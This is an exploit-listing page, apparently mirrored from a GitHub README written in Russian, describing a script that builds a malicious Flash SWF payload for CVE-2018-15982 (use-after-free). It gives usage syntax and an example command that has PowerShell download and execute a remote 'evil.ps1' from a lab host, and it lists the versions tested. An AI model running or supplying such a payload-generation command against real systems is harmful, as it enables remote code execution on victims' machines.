Sploitus

Exploit for adobe-flash-cve2018-15982

kitploit · 2026-09-06

Exploit Code

MARKDOWN34 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-KPHONGAGSORN-ADOBE-FLASH-CVE2018-15982
# Adobe Flash CVE-2018-15982

Этот скрипт создает swf-нагрузку для CVE-2018-15982, основанную на PoC из https://github.com/smgorelik/Windows-RCE-exploits. Уязвимость была обнаружена Chenming Xu и Ed Miles из Gigamon ATR.

Уязвимость представляет собой ошибку типа use-after-free, позволяющую выполнить произвольный код в Flash. Дополнительную информацию можно найти по ссылкам ниже.

  * https://threatpost.com/adobe-patches-zero-day-vulnerability-in-flash-player/139629/
  * https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-15982



Примечание: в настоящее время происходит распыление только одного блока — я заметил это после создания скрипта.

Использование:

`python create_swf.py <команда> <имя выходного файла>`

Пример использования:

`python create_swf.py "powershell.exe IEX (iwr 'http://192.168.56.101/evil.ps1')" downloadtest.swf`

Протестировано на:

  * Windows 10 Enterprise 10.0.17134, Internet Explorer 11.285.17134.0
  * Adobe Flash 31.0.0.153, 29.0.0.140



## Пример

Создание нагрузки:

![alt text](https://raw.githubusercontent.com/kphongagsorn/adobe-flash/master/images/create.png)